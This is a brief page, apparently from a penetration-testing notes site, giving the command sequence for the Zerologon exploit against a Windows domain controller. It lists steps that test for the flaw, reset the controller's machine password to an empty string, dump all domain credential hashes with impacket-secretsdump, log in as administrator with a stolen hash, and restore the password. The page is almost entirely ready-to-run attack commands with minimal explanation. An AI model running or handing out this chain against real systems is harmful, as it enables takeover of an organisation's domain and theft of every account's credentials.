zero logon exploit
Last updated
Was this helpful?
Last updated
Was this helpful?
This exploit changes the DC Password to an empty string.
python3 zerologon_tester.py DOMAIN DC_IP
Clone
python3 exploit.py DOMAIN DC_IP
impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP - no-pass
impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP
Note the plaintext password plain_password_hex
python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX